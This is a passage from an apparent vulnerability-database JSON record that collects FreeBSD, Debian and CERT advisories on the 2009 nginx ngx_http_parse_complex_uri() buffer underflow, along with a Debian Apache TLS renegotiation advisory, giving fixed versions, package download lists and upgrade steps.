SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12600", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629"], "description": "\nnginx development team reports:\n\nA segmentation fault might occur in worker process while\n\t specially crafted request handling.\n\n", "edition": 4, "modified": "2009-09-15T00:00:00", "published": "2009-09-14T00:00:00", "id": "152B27F0-A158-11DE-990C-E5B1D4C882E0", "href": "https://vuxml.freebsd.org/freebsd/152b27f0-a158-11de-990c-e5b1d4c882e0.html", "title": "nginx -- remote denial of service vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:21:54", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1884-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nSeptember 14th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : nginx\nVulnerability : buffer underflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-2629\n\nChris Ries discovered that nginx, a high-performance HTTP server, reverse\nproxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when\nprocessing certain HTTP requests. An attacker can use this to execute\narbitrary code with the rights of the worker process (www-data on Debian)\nor possibly perform denial of service attacks by repeatedly crashing\nworker processes via a specially crafted URL in an HTTP request.\n\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 0.4.13-2+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.6.32-3+lenny2.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.7.61-3.\n\n\nWe recommend that you upgrade your nginx packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13.orig.tar.gz\n Size/MD5 checksum: 436610 d385a1e7a23020d421531818d5606b5b\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.diff.gz\n Size/MD5 checksum: 6578 db07ea3610574b7561cbedef09a51bf2\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.dsc\n Size/MD5 checksum: 618 12706d3c92e0c225dd47367aae43115e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_alpha.deb\n Size/MD5 checksum: 211310 5e7efe11eca1aea2f6611cd913bf519d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_amd64.deb\n Size/MD5 checksum: 195352 3fc58e180fca1465a360f37bad3da7db\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_arm.deb\n Size/MD5 checksum: 187144 6e49d62ee4efa11f9b75292bcb3be1d7\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_hppa.deb\n Size/MD5 checksum: 205204 7f8f76147eccbf489c900831782806c0\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_i386.deb\n Size/MD5 checksum: 184912 7dc5e3672666d1b5666f6ce79f4c755b\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_ia64.deb\n Size/MD5 checksum: 278490 669e8d9e43a123367c429ca34927e22a\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mips.deb\n Size/MD5 checksum: 208238 2e6f25c4bc053d1bb1ac82bec398624d\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mipsel.deb\n Size/MD5 checksum: 207640 e6b0e0e8148d1786274cf9a4b7f9d060\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_powerpc.deb\n Size/MD5 checksum: 186542 5b1460ab8707b1ccb3cf0b75c8ea2548\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_s390.deb\n Size/MD5 checksum: 199720 8ecde48c393df02819c45bc966f73eae\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_sparc.deb\n Size/MD5 checksum: 185032 15212749985501b223af7888447fc433\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.dsc\n Size/MD5 checksum: 1238 41197ff9eca3cb3707ca5eff5e431183\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.diff.gz\n Size/MD5 checksum: 10720 b2c8f555b7de4ac17b2c98247fd2ae6b\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32.orig.tar.gz\n Size/MD5 checksum: 522183 c09a2ace3c91f45dabbb608b11e48ed1\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_alpha.deb\n Size/MD5 checksum: 297782 dc05cbf94712134298acdedad2a4e85d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_amd64.deb\n Size/MD5 checksum: 268518 58dc10022dd7b20ff58a4b839be62a43\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_arm.deb\n Size/MD5 checksum: 251688 7f5a9499de8ba40ae2caea7de183b966\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_hppa.deb\n Size/MD5 checksum: 282324 f0264b98d0564f51692292c0ec269a19\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_i386.deb\n Size/MD5 checksum: 253060 a64340fa3a9a5b58e23267f13abfeeed\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_ia64.deb\n Size/MD5 checksum: 420004 a2e6de141194e41a60893b0b2c457f28\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_mips.deb\n Size/MD5 checksum: 283220 04407318230621467ea3a42bfb11d724\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_mipsel.deb\n Size/MD5 checksum: 283444 0bd0eb1e415d7d6877a95e21ddb91fa7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_powerpc.deb\n Size/MD5 checksum: 276056 fae6451ab5ac767f93d3229a9e01f3bf\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_sparc.deb\n Size/MD5 checksum: 256778 df6a47fe174736468910a4166fe0a064\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2009-09-14T15:58:57", "published": "2009-09-14T15:58:57", "id": "DEBIAN:DSA-1884-1:95A85", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00205.html", "title": "[SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:15:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-3 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : backward compatibility option for SSL/TLS insecure\n renegotiation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 587037\n\nDSA-2141-1 changed the behaviour of the openssl libraries in a server\nenvironment to only allow SSL/TLS renegotiation for clients that\nsupport the RFC5746 renegotiation extension. This update to apache2\nadds the new SSLInsecureRenegotiation configuration option that allows\nto restore support for insecure clients. More information can be found\nin the file /usr/share/doc/apache2.2-common/NEWS.Debian.gz .\n\nFor the stable distribution (lenny), the compatibility option has been\nincluded in version 2.2.9-10+lenny9.\n\nIn addition, apache2-mpm-itk has been rebuilt to work with the updated\napache2 packages. The new version number is 2.2.6-02-1+lenny4.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the compatibility option has been included since version\n2.2.15-1.\n\nWe recommend that you upgrade your apache2 and apache2-mpm-itk\npackages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-01-05T23:21:10", "published": "2011-01-05T23:21:10", "id": "DEBIAN:DSA-2141-1:7D2D7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00003.html", "title": "[SECURITY] [DSA-2141-1] New apache2 packages add backward compatibility option", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:12", "bulletinFamily": "info", "cvelist": ["CVE-2009-2629"], "description": "### Overview \n\nA vulnerability in the nginx web server may allow remote attackers to execute arbitrary code on an affected system.\n\n### Description \n\n[nginx](<http://nginx.net/>) is an HTTP server and mail proxy server that is available for a number of different platforms. A buffer underflow vulnerability exists in the `ngx_http_parse_complex_uri()` function when handling specially crafted URIs. Exploitation of this vulnerability would cause the nginx server to write data contained in the URI to heap memory before the allocated buffer. \n \n--- \n \n### Impact \n\nAs with a number of other web servers, nginx is designed to operate with a single privileged master process and multiple unprivileged worker processes handling specific requests. A remote, unauthenticated attacker may be able to execute arbitrary code in the context of the worker process or cause the worker process to crash, resulting in a denial of service. \n \n--- \n \n### Solution \n\n**Upgrade or apply a patch**\n\nUpdated versions of the nginx package have been released to address this issue. Users should consult the Systems Affected section of this document for information about specific vendors. \n \n--- \n \n### Vendor Information\n\n180065\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian GNU/Linux __ Affected\n\nNotified: September 05, 2009 Updated: September 14, 2009 \n\n**Statement Date: September 14, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nDebian has published [Debian Security Advisory DSA-1884](<http://www.debian.org/security/2009/dsa-1884>) in response to this issue. Users are encouraged to review this advisory and apply the patches it describes.\n\n### Vendor References\n\n * <http://www.debian.org/security/2009/dsa-1884>\n\n### Gentoo Linux __ Affected\n\nNotified: September 05, 2009 Updated: September 21, 2009 \n\n**Statement Date: September 18, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe Gentoo Security Team has published [Gentoo Linux Security Advisory GLSA 200909-18](<http://security.gentoo.org/glsa/glsa-200909-18.xml>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\n### Vendor References\n\n * <http://security.gentoo.org/glsa/glsa-200909-18.xml>\n\n### nginx __ Affected\n\nUpdated: September 15, 2009 \n\n**Statement Date: September 05, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe author of nginx has published the following updated versions of the software to address this issue:\n\n * Development version: nginx-0.8.15, nginx/Windows-0.8.15, [change log](<http://nginx.net/CHANGES>)\n * Stable version: nginx-0.7.62, nginx/Windows-0.7.62, [change log](<http://nginx.net/CHANGES-0.7>)\n * Legacy stable version: nginx-0.6.39, [change log](<http://nginx.net/CHANGES-0.6>)\n * Legacy version: nginx-0.5.38, [change log](<http://nginx.net/CHANGES-0.5>)\nUsers of nginx from the original distribution are encouraged to upgrade to one of these versions (or newer, as appropriate). The author has also published a to address this issue. \n\n### SUSE Linux __ Not Affected\n\nNotified: September 05, 2009 Updated: September 08, 2009 \n\n**Statement Date: September 07, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`as far as I can see we never shipped the nginx web-server.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Not Affected\n\nNotified: September 05, 2009 Updated: September 09, 2009 \n\n**Statement Date: September 08, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Sun Products are not vulnerable, since nginx is not included in any supported Sun product offering. A vulnerable version of nginx is available as an unsupported component of WebStack project, which will be updated to fix this vulnerability.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group __ Not Affected\n\nNotified: September 05, 2009 Updated: September 08, 2009 \n\n**Statement Date: September 08, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`SCO does not ship this web server with any of its products and we are therefore not affected by this vulnerability.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Apple Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DragonFly BSD Project Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Infoblox Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mandriva S. A. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: September 05, 2009 Updated: September 06, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n[](<>)\n\n### Acknowledgements\n\nThanks to Chris Ries of the Carnegie Mellon University Information Security Office for reporting this vulnerability.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-2629](<http://web.nvd.nist.gov/vuln/detail/CVE-2009-2629>) \n---|--- \n**Severity Metric:** | 4.22 \n**Date Public:** | 2009-09-14 \n**Date First Published:** | 2009-09-15 \n**Date Last Updated: ** | 2009-09-21 19:50 UTC \n**Document Revision: ** | 9 \n", "modified": "2009-09-21T19:50:00", "published": "2009-09-15T00:00:00", "id": "VU:180065", "href": "https://www.kb.cert.org/vuls/id/180065", "type": "cert", "title": "Nginx ngx_http_parse_complex_uri() buffer underflow vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-2629"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1884-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nSeptember 14th, 2009 http://www.debian.org/security/faq\r\n- --------------------------------------------------------------------------\r\n\r\nPackage : nginx\r\nVulnerability : buffer underflow\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2009-2629\r\n\r\nChris Ries discovered that nginx, a high-performance HTTP server, reverse\r\nproxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when\r\nprocessing certain HTTP requests. An attacker can use this to execute\r\narbitrary code with the rights of the worker process (www-data on Debian)\r\nor possibly perform denial of service attacks by repeatedly crashing\r\nworker processes via a specially crafted URL in an HTTP request.\r\n\r\n\r\nFor the oldstable distribution (etch), this problem has been fixed in\r\nversion 0.4.13-2+etch2.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 0.6.32-3+lenny2.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 0.7.61-3.\r\n\r\n\r\nWe recommend that you upgrade your nginx packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390\r\nand sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13.orig.tar.gz\r\n Size/MD5 checksum: 436610 d385a1e7a23020d421531818d5606b5b\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.diff.gz\r\n Size/MD5 checksum: 6578 db07ea3610574b7561cbedef09a51bf2\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.dsc\r\n Size/MD5 checksum: 618 12706d3c92e0c225dd47367aae43115e\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_alpha.deb\r\n Size/MD5 checksum: 211310 5e7efe11eca1aea2f6611cd913bf519d\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_amd64.deb\r\n Size/MD5 checksum: 195352 3fc58e180fca1465a360f37bad3da7db\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_arm.deb\r\n Size/MD5 checksum: 187144 6e49d62ee4efa11f9b75292bcb3be1d7\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_hppa.deb\r\n Size/MD5 checksum: 205204 7f8f76147eccbf489c900831782806c0\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_i386.deb\r\n Size/MD5 checksum: 184912 7dc5e3672666d1b5666f6ce79f4c755b\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_ia64.deb\r\n Size/MD5 checksum: 278490 669e8d9e43a123367c429ca34927e22a\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mips.deb\r\n Size/MD5 checksum: 208238 2e6f25c4bc053d1bb1ac82bec398624d\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mipsel.deb\r\n Size/MD5 checksum: 207640 e6b0e0e8148d1786274cf9a4b7f9d060\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_powerpc.deb\r\n Size/MD5 checksum: 186542 5b1460ab8707b1ccb3cf0b75c8ea2548\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_s390.deb\r\n Size/MD5 checksum: 199720 8ecde48c393df02819c45bc966f73eae\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_sparc.deb\r\n Size/MD5 checksum: 185032 15212749985501b223af7888447fc433\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, 